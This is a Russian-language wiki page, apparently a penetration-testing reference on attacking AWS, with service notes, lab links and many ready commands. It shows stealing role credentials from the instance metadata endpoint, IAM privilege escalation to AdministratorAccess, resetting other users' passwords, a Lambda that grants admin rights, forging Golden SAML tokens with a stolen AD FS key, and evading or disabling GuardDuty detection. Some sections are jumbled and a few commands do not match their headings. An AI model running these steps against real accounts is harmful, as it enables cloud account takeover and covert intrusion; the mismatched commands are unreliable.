* Rekognition - определение того, что изображено на фото. Например, чтобы оградить от 18+ контента.

* Custom - пользовательский вариант

Интересный факт - использует "Quill Rich Text Editor" для текста с инструкциями. То есть, если в нем будет уязвимость, то можно проверить амазон тоже.

https://aws.amazon.com/ru/augmented-ai/

Также у сервиса есть Workers - сервера, выполняющие кучу тасков. Они могут быть трех типов:

1. Amazon Mechanical Turk - тупо сервера Amazon, за которые надо платить.

2. Private - юзают если обрабатывают приватную инфу или задачи, не поддерживаемые первым пунктом (ну или регион не поддерживается). Это команды, которые имеют доступ к данным и которые могут запускать задачи. Команды менеджарятся с Amazon Cognito.

3. Vendor - решения сторонних разработчиков.

=== Роли ===

==== AmazonAugmentedAIIntegratedAPIAccess ====

Дает доступ к Augmented AI Runtime, Amazon Rekognition или Amazon Textract API.

TODO: проверить, дает ли это еще возможностей злоумышленнику

== CodeGuru ==

https://aws.amazon.com/ru/codeguru/

== Comprehend ==

https://aws.amazon.com/ru/comprehend/

== DevOps Guru ==

https://aws.amazon.com/ru/devops-guru/

== Elastic Inference ==

https://aws.amazon.com/machine-learning/elastic-inference/

== Forecast ==

https://aws.amazon.com/ru/forecast/

== Fraud Detector ==

https://aws.amazon.com/ru/fraud-detector/

== HealthLake ==

https://aws.amazon.com/healthlake/

== Kendra ==

https://aws.amazon.com/kendra/?did=ap_card&trk=ap_card

== Lex ==

https://aws.amazon.com/lex/?did=ap_card&trk=ap_card

== Lookout for Equipment ==

https://aws.amazon.com/ru/lookout-for-equipment/

== Lookout for Metrics ==

https://aws.amazon.com/lookout-for-metrics/

== Lookout for Vision ==

https://aws.amazon.com/lookout-for-vision/

== Monitron ==

https://aws.amazon.com/monitron/

== Personalize ==

https://aws.amazon.com/personalize/

== Polly ==

https://aws.amazon.com/polly/

== Rekognition ==

https://aws.amazon.com/rekognition/

== SageMaker ==

https://aws.amazon.com/sagemaker/

== SageMaker Ground Truth ==

https://aws.amazon.com/sagemaker/groundtruth/

== Textract ==

https://aws.amazon.com/textract/

== Transcribe ==

https://aws.amazon.com/transcribe/

== Translate ==

https://aws.amazon.com/translate/

== Apache MXNet ==

https://aws.amazon.com/ru/mxnet/

== Deep Learning Containers ==

https://aws.amazon.com/machine-learning/containers/

== DeepComposer ==

https://aws.amazon.com/deepcomposer/

== DeepLens ==

https://aws.amazon.com/deeplens/

== DeepRacer ==

https://aws.amazon.com/deepracer/

== Inferentia ==

https://aws.amazon.com/machine-learning/inferentia/

== Panorama ==

https://aws.amazon.com/panorama/

== PyTorch ==

https://aws.amazon.com/pytorch/

== TensorFlow ==

https://aws.amazon.com/tensorflow/

== Deep Learning AMI ==

https://aws.amazon.com/machine-learning/amis/

= Утилиты =

== Вычисление ролей ==

=== enumerate-iam ===
github.com:andresriancho/enumerate-iam.git

== Эксплуатация ==

=== Golden SAML ===

Суть атаки в том, что зная ключ, которым подписываются SAML-запросы, вы можете подделать ответ и получить произвольные привилегии в SSO.

Подробнее про эксплуатацию тут: https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps

==== shimit ====
https://github.com/cyberark/shimit

Установка:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
cd /tmp
python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml
git clone https://github.com/cyberark/shimit
cd shmit
python shmit.py
</syntaxhighlight>

В начале потребуется доступ к AD FS аккаунту из персонального хранилища которого украсть приватный ключ ключ.
Сделать это можно используя mimikatz, но в примере сделано через библиотеку Microsoft.Adfs.Powershell и powershell

Пример эксплуатации:
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:auto" >
# Получаем приватный ключ
[System.Convert]::ToBase64String($cer.rawdata)
(Get-ADFSProperties).Identifier.AbsoluteUri
(Get-ADFSRelyingPartyTrust).IssuanceTransformRule

# Получаем инфу о юзерах - выбираем цель
aws iam list-users

# Получаем токен
python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012

# Проверяем текущий аккаунт
aws opsworks describe-my-user-profile
</syntaxhighlight>

== Проверки безопасности ==

Для администраторов преимущественно.

=== Zeus ===

https://github.com/DenizParlak/Zeus

== Другое ==

=== aws_consoler ===

https://github.com/NetSPI/aws_consoler

== All-In-One ==

=== pacu ===

https://github.com/RhinoSecurityLabs/pacu

=== ScoutSuite ===

https://github.com/nccgroup/ScoutSuite

=== cloudfox ===

https://github.com/BishopFox/cloudfox

= Ссылки =

== Статьи ==

[https://frichetten.com/blog/hijack-iam-roles-and-avoid-detection/ Hijacking IAM Roles and Avoiding Detection]

[https://frichetten.com/blog/bypass-guardduty-pentest-alerts/ Bypass GuardDuty PenTest Alerts]

[https://frichetten.com/blog/ssm-agent-tomfoolery/ Intercept SSM Agent Communications]

== Лаборатории ==

[https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6 Damn Vulnerable Cloud Application]

[https://github.com/nccgroup/sadcloud SadCloud]

[http://flaws.cloud Flaws]

[http://flaws2.cloud/ Flaws]

[https://xakep.ru/2022/03/21/htb-stacked/ HackTheBox Stacked Writeup]

[https://github.com/RhinoSecurityLabs/cloudgoat CloudGoat]

[https://github.com/nccgroup/sadcloud SadCloud]

[https://www.wellarchitectedlabs.com/security/ AWS Well-Architected Labs]

[https://labs.withsecure.com/publications/attack-detection-fundamentals-2021-aws-lab-1 Attack Detection Fundamentals 2021: AWS - Lab #1]

[https://pentesting.cloud/ Free AWS Security Labs]

== Краткие заметки ==

[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest.md PayloadAllTheThings]

[https://book.hacktricks.xyz/pentesting/pentesting-web/buckets/aws-s3 hacktricks-s3]

[https://book.hacktricks.xyz/cloud-security/aws-security hacktricks-aws]

[https://learntocloud.guide/#/phase5/README learntocloud(много ссылок)]

== Книги ==

[https://www.amazon.com/dp/1789136725/ Hands-On AWS Penetration Testing with Kali Linux]

Aws

2022-10-17T10:51:24Z

Drakylar: /* Augmented AI (Amazon A2I) */

AWS - Amazon Web Service. Одна из первых облачных систем, состоящая из многих сервисов, которые при некорректной настройке оставляют дыры в безопасности.

= Организационные моменты =

При проведении тестирования на проникновение, требуется предупредить AWS (составить заявку).

Подробнее тут: https://aws.amazon.com/ru/security/penetration-testing/

= Общие концепции =

== Службы ==

Концепция служб в AWS позволяет автоматизировать многие процессы, включая саму разработку архитектуры.

Это экосистема многих сервисов. И AWS стремится увеличить их количество.

Например, связать сервис сбора логов и сервис по реагированию на инциденты, а результаты класть на сервис S3.

== Регионы ==

AWS разделен на регионы. Часть сервисов кросс-региональные, но большинство привязываются к конкретным регионам.

{| class="wikitable"
|+Регионы AWS
|-
| '''Название региона'''
| '''Endpoint(HTTPS)'''
|-
|us-east-2
|rds.us-east-2.amazonaws.com

rds-fips.us-east-2.api.aws

rds.us-east-2.api.aws

rds-fips.us-east-2.amazonaws.com
|-
|us-east-1
|rds.us-east-1.amazonaws.com

rds-fips.us-east-1.api.aws

rds-fips.us-east-1.amazonaws.com

rds.us-east-1.api.aws
|-
|us-west-1
|rds.us-west-1.amazonaws.com

rds.us-west-1.api.aws

rds-fips.us-west-1.amazonaws.com

rds-fips.us-west-1.api.aws
|-
|us-west-2
|rds.us-west-2.amazonaws.com

rds-fips.us-west-2.amazonaws.com

rds.us-west-2.api.aws

rds-fips.us-west-2.api.aws
|-
|af-south-1
|rds.af-south-1.amazonaws.com

rds.af-south-1.api.aws
|-
|ap-east-1
|rds.ap-east-1.amazonaws.com

rds.ap-east-1.api.aws
|-
|ap-southeast-3
|rds.ap-southeast-3.amazonaws.com
|-
|ap-south-1
|rds.ap-south-1.amazonaws.com

rds.ap-south-1.api.aws
|-
|ap-northeast-3
|rds.ap-northeast-3.amazonaws.com

rds.ap-northeast-3.api.aws
|-
|ap-northeast-2
|rds.ap-northeast-2.amazonaws.com

rds.ap-northeast-2.api.aws
|-
|ap-southeast-1
|rds.ap-southeast-1.amazonaws.com

rds.ap-southeast-1.api.aws
|-
|ap-southeast-2
|rds.ap-southeast-2.amazonaws.com

rds.ap-southeast-2.api.aws
|-
|ap-northeast-1
|rds.ap-northeast-1.amazonaws.com

rds.ap-northeast-1.api.aws
|-
|ca-central-1
|rds.ca-central-1.amazonaws.com

rds.ca-central-1.api.aws

rds-fips.ca-central-1.api.aws

rds-fips.ca-central-1.amazonaws.com
|-
|eu-central-1
|rds.eu-central-1.amazonaws.com

rds.eu-central-1.api.aws
|-
|eu-west-1
|rds.eu-west-1.amazonaws.com

rds.eu-west-1.api.aws
|-
|eu-west-2
|rds.eu-west-2.amazonaws.com

rds.eu-west-2.api.aws
|-
|eu-south-1
|rds.eu-south-1.amazonaws.com

rds.eu-south-1.api.aws
|-
|eu-west-3
|rds.eu-west-3.amazonaws.com

rds.eu-west-3.api.aws
|-
|eu-north-1
|rds.eu-north-1.amazonaws.com

rds.eu-north-1.api.aws
|-
|me-south-1
|rds.me-south-1.amazonaws.com

rds.me-south-1.api.aws
|-
|sa-east-1
|rds.sa-east-1.amazonaws.com

rds.sa-east-1.api.aws
|-
|us-gov-east-1
|rds.us-gov-east-1.amazonaws.com
|-
|us-gov-west-1
|rds.us-gov-west-1.amazonaws.com
|}

Или только регионы (могут пригодиться при переборе):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
us-east-2
us-east-1
us-west-1
us-west-2
af-south-1
ap-east-1
ap-southeast-3
ap-south-1
ap-northeast-3
ap-northeast-2
ap-southeast-1
ap-southeast-2
ap-northeast-1
ca-central-1
eu-central-1
eu-west-1
eu-west-2
eu-south-1
eu-west-3
eu-north-1
me-south-1
sa-east-1
us-gov-east-1
us-gov-west-1
</syntaxhighlight>

== Доступы ==

== Консольная утилита(awscli) ==

Чаще всего для взаимодействия с сервисами AWS вам потребуется консольная утилита awscli.

Утилита работает с настроенными профилями.

=== Файлы ===

==== ~/.aws/credentials ====

Файл с учетными данными профилей. Перефразирую: получив данные из этого файла вы, вероятнее всего, получите контроль над аккаунтами в нем.

У каждого профиля будет указан:

* Access Key ID - 20 случайных букв/цифр в верхнем регистре, часто начинается с "AKIA..."

* Access Key - 40 случайных символов различного регистра.

* Access Token - не всегда указывается

Полный список параметров можно посмотреть тут: https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-files.html#cli-configure-files-settings

Пример содержимого файла (сохранен профиль default):

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
aws_access_key_id=AKIAIOSFODNN7EXAMPLE
aws_secret_access_key=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
aws_session_token = AQoEXAMPLEH4aoAH0gNCAPyJxz4BlCFFxWNE1OPTgk5TthT+FvwqnKwRcOIfrRh3c/LTo6UDdyJwOOvEVPvLXCrrrUtdnniCEXAMPLE/IvU1dYUg2RVAJBanLiHb4IgRmpRV3zrkuWJOgQs8IZZaIv2BXIa2R4Olgk
</syntaxhighlight>

==== ~/.aws/config ====

Файл с региональными настройками профиля(регион по-умолчанию).
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
region=us-west-2
output=json
</syntaxhighlight>

==== ~/.aws/cli/cache ====

Закешированные учетные данные

==== ~/.aws/sso/cache ====

Закешированные данные Single-Sign-On

=== Команды ===

Общее построение команды выглядит как:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws <название_сервиса> <действие> <дополнительные_аргументы>
</syntaxhighlight>

Примеры:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Вывести все S3-хранилища.
aws s3 ls

# Создание нового пользователя - сервис IAM
aws iam create-user --user-name aws-admin2
</syntaxhighlight>

== IMDS (Instance Metadata Service) ==

Это http API для запросов из EC2. Полезно если, например, у вас есть уязвимость SSRF в EC2.

Есть 2 версии:

*IMDSv1 - версия 1 по-умолчанию, не требует токен.

*IMDSv2 - версия 2, для запросов требуется токен.

Запрос без токена:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
curl http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Запрос с токеном:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` && curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Кроме доп. информации можно получить access-token для доступа в AWS с сервисного аккаунта ec2 (только для IMDSv2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# В начале делаем запрос на директорию /security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Потом выбираем нужный аккаунт и делаем запрос на него
http://169.254.169.254/latest/meta-data/iam/security-credentials/test-account
</syntaxhighlight>

Пример ответа:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Code" : "Success",
"LastUpdated" : "2019-12-03T07:15:34Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "xxxxxxxxxxxxxxxxxxx",
"SecretAccessKey" : "xxxxxxxxxxxxxxxxxxxxx",
"Token" : "xxxxxxxxxxxxxxxxxxxxx",
"Expiration" : "2019-12-03T13:50:22Z"
}
</syntaxhighlight>
После чего эти учетные данные можно использовать с awscli.

Другие полезные Endpoint'ы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://169.254.169.254/
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access
http://169.254.169.254/latest/dynamic/instance-identity/document
</syntaxhighlight>

= Ролевая модель =

Почти все описание доступа идет через ролд. А роли в свою очередь состоят из двух типов политик:

* trust policy - определяет, чья будет роль

* permissions policy - определяет какой доступ будет у тех, у кого эта роль.

Каждая политика состоит из следующих компонентов:

* Ресурс - цель, кому выдается правило. Может быть:
** Пользователь
** Группа, в которой могут быть аккаунты по какому то признаку
** Другая политика.

* Роль(Action) - какое-либо действие (например, iam:ListGroupPolicies - посмотреть список груповых политик)

* Тип правила(Effect) - разрешение или запрет.

* Политика(Policy) - совокупность Роль(действие) -> разрешение/запрет -> Ресурс(кому).

* Условия(Condition) - отдельные условия, например, ip.

Пример политики:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Version": "2012-10-17", //Версия политики
"Statement": [
{
"Sid": "Stmt32894y234276923" //Опционально - уникальный идентификатор
"Effect": "Allow", //Разрешить или запретить
"Action": [ //Разрешенные/Запрещенные действия
"ec2:AttachVolume",
"ec2:DetachVolume"
],
"Resource": [ //На какие ресурсы можно/нельзя совершать действия
"arn:aws:ec2:*:*:volume/*",
"arn:aws:ec2:*:*:instance/*"
],
"Condition": { //Опционально - условия срабатывания
"ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"}
}
}
]
}
</syntaxhighlight>

== Определение ролей ==

=== Вручную ===
TODO команды по определению своих ролей

=== Автоматизированно ===

== Эксплуатация ==

Когда вы определили, какие роли у вас есть, перейдите выше на соответствующий сервис, к которому идет данная роль и прочтите как ее эксплуатировать.

Тут будут отдельные роли, которые не прикреплены ни к одному сервису.

=== Административный доступ ===

Как выглядит роль с административным доступом:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
"Statement": [
{
"Effect": "Allow",
"Action": [
"*"
],
"Resource": "*"
}
]
</syntaxhighlight>

= Службы =

== IAM ==

Сервис по обеспечению контроля доступа. Подробнее про ролевую модель можно почитать в соответствующей главе.

=== Роли - повышение привилегий ===

==== iam:UpdateLoginProfile ====

Сбросить пароль у других пользователей:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam update-login-profile --user-name target_user --password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:PassRole + ec2:RunInstance ====

См. EC2

==== iam:PassRole + glue:CreateDevEndpoint ====

См. Glue

==== iam:PutRolePolicy ====

Создать или обновить inline-политику для роли.

==== iam:PutGroupPolicy ====

Создать или обновить inline-политику для группы.

==== iam:PuserUserPolicy ====

Создать или обновить inline-политику.

==== iam:UpdateAssumeRolePolicy + sts:AssumeRole ====

Обновить документ "AssumeRolePolicyDocument" для роли.

=== Роли - повышение до админа ===

==== iam:AddUserToGroup ====

Добавить юзера в административную группу:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam add-user-to-group --group-name <название_группы> --user-name <логин>
</syntaxhighlight>

==== iam:PutUserPolicy ====

Право добавить своб политику к ранее скомпрометированным обьектам.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam put-user-policy --user-name <логин> --policy-name my_inline_policy --policy-document file://path/to/administrator/policy.json
</syntaxhighlight>

==== iam:CreateLoginProfile ====

Привилегия для создания профиля(с паролем) для аккаунта, выставить новый пароль и перейти под этого пользователя.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam create-login-profile --user-name target_user –password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:UpdateLoginProfile ====

Добавить существующую политику к любому пользователю.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachGroupPolicy ====

Добавить существующую политику к любой группе.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachRolePolicy ====

Добавить существующую политику к любой роли.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-role-policy --role-name role_i_can_assume --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:CreatePolicy ====

Создать административную политику.

==== iam:CreatePolicyVersion + iam:SetDefaultPolicyVersion ====

Позволяет поменять политику, выставленную администраторами сети и применить ее, после чего повысить привилегии у обьекта.

Например, если у вас это право, то вы можете создать произвольную политику, дающую полный доступ и применить ее.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание политики
aws iam create-policy-version --policy-arn target_policy_arn --policy-document file://path/to/administrator/policy.json --set-as-default
# Установка политики по умолчанию.
aws iam set-default-policy-version –policy-arn target_policy_arn –version-id v2
</syntaxhighlight>

==== iam:PassRole + ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile ====

См. EC2

==== iam:AttachUserPolicy ====

Позволяет прикрепить политику к пользователю. Если существует политика, дающая админские права - повышение.

== AWS Shield ==

Сервис для защиты от DDoS.

== Cognito ==

Позволяет быстро и просто добавлять возможности регистрации, авторизации и контроля доступа пользователей в мобильные и интернет-приложения.

=== Основное ===

Cognito отвечает за следующие действия:

* Регистрация пользователя (email + пароль)

* Авторизация пользователя

* Работа с сохраненной пользовательской информацией (устанавливается приложением)

* Специальные действия (например, предоставление AWS-ключей)

Все общение идет по HTTP(s). Особенность системы в том, что Cognito общается как напрямую с чужим веб-сайтом, так и напрямую с клиентским браузером. То есть веб-сервер не знает, какой был передан пароль (в нормальной реализации).

Пример URL: cognito-identity.us-east-1.amazonaws.com

За действие отвечает HTTP-заголовок "X-Amz-Target". В своем роде, это Endpoints API.

Какие параметры требуются для работы с ним:

1. Название Endpoint'а - "X-Amz-Target" заголовок

2. Регион - "aws_project_region" параметр

3. Session token - позже требуется для запросов.

4. Identity Pool ID - нужен для запросов типа Identity Pools.

Также пишут, что Cognito разделяется на две основные части:

* User Pools - для тех, кому нужна только регистрация и аутентификация

* Identity Pools - для тех, кому еще и нужен доступ к AWS-ресурсам.

=== X-Amz-Target (Endpoints) ===

==== AWSCognitoIdentityService.UpdateUserAttributes ====

У каждого пользователя есть поля, которые могут быть установлены самим пользователем (например, фамилия или дата рождения). Но также это могут быть и критичные поля, такие, как ID пользователя, администратор ли он и так далее.

Также раньше можно было менять поле email'а пользователя (0day): https://infosecwriteups.com/hacking-aws-cognito-misconfiguration-to-zero-click-account-takeover-36a209a0bd8a

Важно! Указано, что могут быть отправки СМС-уведомлений, так что тестировать осторожно.

P.S. Мб неверно название Endpoint'а. Надо проверять.

==== AWSCognitoIdentityService.GetCredentialsForIdentity ====

Позволяет получить AWS ключи для работы с AWS-консолью. По-умолчанию отключено.

Требуется aws_identity_pool_id.

В некоторых примерах оно также было указано как "com.amazonaws.cognito.identity.model.AWSCognitoIdentityService.GetCredentialsForIdentity"

Подробнее тут: https://blog.appsecco.com/exploiting-weak-configurations-in-amazon-cognito-in-aws-471ce761963

==== AWSCognitoIdentityService.GetOpenIdToken ====

Позволяет получить OpenID токен, действительный на 10 минут.

В примере требуется только "IdentityID"

==== AWSCognitoIdentityService.GetOpenIdTokenForDeveloperIdentity ====

Тоже позволяет получить OpenID токен, действительный на 10 минут. Но также создает новый "IdentityID" (если он не был указан).

==== AWSCognitoIdentityService.GetCredentialsForIdentity ====

Получить учетные данные пользователя по IdentityID: SecretKey, SessionToken, AccessKeyID.

https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetCredentialsForIdentity.html

== GuardDuty ==

Сервис для детектирования атак используя машинное обучение.

Для детекта использует следующие сервисы:

* CloudTrail
* VPC Flow Logs
* DNS Logs
* ...to be continued

=== Обход защиты ===

Далее идут правила детекта и то, как их можно обойти.

==== UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration ====

Детектит, если AWS-API команды были запущены за пределами EC2 (используя токен этого EC2).

Правило эффективно, если хакер хочет украть токен с EC2 и использовать его вне EC2 (например, если есть только SSRF).

Обход простой: создать свой EC2-инстанс и делать API-запросы с полученными учетными данными жертвы.
Тогда правило не сработает, даже если учетные данные не принадлежат данной EC2 тк правило проверяет source ip и является ли он EC2.

Может быть для этого выгодно держать проксирующий сервер EC2.

==== UserAgent rules ====

Суть в том, что GuardDuty будет добавлять Alert если AWS-CLI использует UserAgent например Kali.
Варианты:

* Использовать утилиту pacu (уже есть смена User-Agent)

* Отредактировать botocore(https://github.com/boto/botocore) по пути /usr/local/lib/python3.7/dist-packages/botocore/session.py: поменять platform.release() на строку юзерагента.

=== Роли - Управление ===

Список ролей: https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonguardduty.html

==== guardduty:UpdateDetector ====

Позволяет выключить GuardDuty (ну или редатировать правила):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty update-detector --detector-id <id of detector> --no-enable
</syntaxhighlight>
==== guardduty:DeleteDetector ====

Удалить правило детектирования:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty delete-detector --detector-id <id of detector>
</syntaxhighlight>

== STS (Security Token Service) ==

Сервис, позволяющий запросить временные учетные данные с ограниченными примилегиями для IAM-пользователей

== KMS (Key Management Service) ==

Сервис для создания криптографических ключей, управления ими и использования их в других сервисах.

Администраторы амазона не смогут получить к ним доступ.

Ключи со временем обновляются:

* Customers keys - раз в 365 дней

* AWS keys - раз в 3 года.

Старые ключи также можно будет использовать для расшифровки.

== CloudHSM (Hardware Security Module) ==

Замена KMS для богатых и тех, кто хочит побольше безопасности. Хранилище ключей, прикрепленное к аппаратному решению.

Пишут, что устройство будет закреплено только за вами.

Также можно получить доступ к CloudHSM-Instance по SSH.

== Athena ==

Интерактивный бессерверный сервис, позволяющий анализировать данные хранилища S3 стандартными средствами SQL.

Умеет работать с шифрованными S3 и сохранять шифрованный вывод.

== EBS (Elastic Block Store) ==

Сервис блочного хранилища (просто жесткий диск, который можно примонтировать).

=== Роли - управление сервисом ===

==== ec2:CreateVolume + ec2:AttachVolume ====

Возможность подключить EBS-Volume/Snapshot к EC2-виртуалке.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание Volume из snapshot'а (если требуется подключить snapshot)
aws ec2 create-volume –snapshot-id snapshot_id --availability-zone zone
# Подключение Volume к виртуалке EC2
</syntaxhighlight>

Далее идем на виртуалку и вводим команды:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Поиск Volume
lsblk
# Проверка есть ли на нем данные
sudo file -s /dev/xvdf
# форматировать образ под ext4 (если неподходящая файловая система)
sudo mkfs -t ext4 /dev/xvdf
# Создаем директорию куда примонтируем позже
sudo mkdir /tmp/newvolume
# Монтируем
sudo mount /dev/xvdf /tmp/newvolume/
</syntaxhighlight>

Диск будет доступен на /tmp/newvolume.

== Lambda ==

Сервис для запуска своего кода в облаке.

=== Роли - повышение привилегий ===

==== lambda:UpdateFunctionCode ====

Позволяет поменять запущенный код, тем самым получив контроль над ролями, прикрепленными к этому коду:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws lambda update-function-code --function-name target_function --zip-file fileb://my/lambda/code/zipped.zip
</syntaxhighlight>

==== lambda:CreateFunction + lambda:InvokeFunction + iam:PassRole ====

Позволяет создать функцию и прикрепить к ней произвольную роль, после чего запустить.

Код функции:
<syntaxhighlight lang="python" line="1" enclose="div" style="overflow-x:scroll" >
import boto3
def lambda_handler(event, context):
client = boto3.client('iam')
response = client.attach_user_policy(
UserName='my_username',
PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
)
return response
</syntaxhighlight>

Команды для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание функции
aws lambda create-function --function-name my_function --runtime python3.6 --role arn_of_lambda_role --handler lambda_function.lambda_handler --code file://my/python/code.py
# Запуск
aws lambda invoke --function-name my_function output.txt
</syntaxhighlight>

=== Роли - управление ===

==== lambda:GetFunction ====

Также может понадобиться lambda:ListFunctions чтобы не перебирать названия функций.

Позволяет прочитать исходный код функции (в котором например может быть секрет сохранен):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получить список функций
aws lambda list-functions --profile uploadcreds
# Получить информацию о Lambda-функции
aws lambda get-function --function-name "LAMBDA-NAME-HERE-FROM-PREVIOUS-QUERY" --query 'Code.Location' --profile uploadcreds
# Скачать исходный код по ссылке из предыдущего ответа
wget -O lambda-function.zip url-from-previous-query --profile uploadcreds
</syntaxhighlight>

== Glue ==

Бессерверная служба интеграции данных, упрощающая поиск, подготовку и объединение данных для анализа, машинного обучения и разработки приложений.

=== Роли - повышение привилегий ===

==== glue:UpdateDevEndpoint ====

Позволяет обновить параметры Glue Development Endpoint, тем самым получив контроль над ролями, прикрепленными к этому Glue Development Endpoint:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# TODO: это не обновление параметров, надо обновить команду
aws glue --endpoint-name target_endpoint --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

==== glue:CreateDevEndpoint + iam:PassRole ====

Позволяет получить доступ к ролям, которые прикреплены к любому сервису Glue:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws glue create-dev-endpoint --endpoint-name my_dev_endpoint --role-arn arn_of_glue_service_role --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

== S3 ==

Файловое хранилище, доступное по http(s).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{bucket_name}.s3.amazonaws.com
https://s3.amazonaws.com/{bucket_name}/

# US Standard
http://s3.amazonaws.com
# Ireland
http://s3-eu-west-1.amazonaws.com
# Northern California
http://s3-us-west-1.amazonaws.com
# Singapore
http://s3-ap-southeast-1.amazonaws.com
# Tokyo
http://s3-ap-northeast-1.amazonaws.com
</syntaxhighlight>

Делать запросы можно:

* В браузере - http(s)

* Используя awscli:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

В S3 может использоваться шифрование:

* SSE-KMS - Server-Side с ключами KMS

* SSE-C - Server-Side с ключами заказчика

* CSE-KMS - Client-Side с ключами KMS

* CSE-C - Client-Side с ключами заказчика

=== Сбор информации ===

==== Определение региона ====

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
$ dig flaws.cloud
;; ANSWER SECTION:
flaws.cloud. 5 IN A 52.218.192.11

$ nslookup 52.218.192.11
Non-authoritative answer:
